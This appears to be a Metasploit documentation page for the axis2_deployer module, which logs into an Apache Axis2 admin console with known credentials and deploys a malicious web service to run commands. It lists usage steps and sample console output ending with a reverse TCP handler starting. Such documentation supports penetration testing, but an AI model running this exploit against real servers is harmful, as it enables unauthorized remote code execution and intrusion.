adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
5f4e82bf69b0dd2425bd72c59cc54196f1bf3e42
metasploit-gs/documentation/modules/exploit/multi/http/axis2_deployer.md
T
itsmeroy2012 03d6e4563c Documentation on axis2_deployer updated 1.2
2017-03-24 21:14:56 +05:30

2.3 KiB
Executable File
Raw Blame History

Description

This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.

Axis2 Web Admin

The Apache Axis2 Web application has three main sections:'Services' lists all the available services deployed in this server, 'Validate' checks the system to see whether all the required libraries are in place and views the system information, and 'Administration' is the Axis2 Web Administration module which is the console for administering the Apache Axis2 installation. The Axis2 Web Administration module provides a way to configure Axis2 dynamically.

IMPORTANT: This dynamic configuration will NOT be persistent, i.e., if the servlet container is restarted, then all the dynamic configuration changes will be lost.

Verification Steps

  1. Do: use exploit/multi/http/axis2_deployer
  2. Do: set RHOSTS [IP]
  3. Do: set RPORT [PORT]
  4. Do: set USERNAME [Username]
  5. Do: set PASSWORD [Password]
  6. Do: run

Sample Output

msf > use exploit/multi/http/axis2_deployer
msf exploit(axis2_deployer) > set RHOST 10.10.155.37
RHOST => 10.10.155.37
msf exploit(axis2_deployer) > set RPORT 8080
RPORT => 8080
msf exploit(axis2_deployer) > set USERNAME admin
USERNAME => admin
msf exploit(axis2_deployer) > set PASSWORD admin123
PASSWORD => admin123
msf exploit(axis2_deployer) > show options

Module options (exploit/multi/http/axis2_deployer):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  admin123         no        The password for the specified username
   PATH      /axis2           yes       The URI path of the axis2 app (use /dswsbobje for SAP BusinessObjects)
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST     10.10.155.37     yes       The target address
   RPORT     8080             yes       The target port
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            no        The username to authenticate as
   VHOST                      no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Java

msf exploit(axis2_deployer) > exploit

[*] Started reverse TCP handler on 10.10.155.39:4444
Reference in New Issue View Git Blame Copy Permalink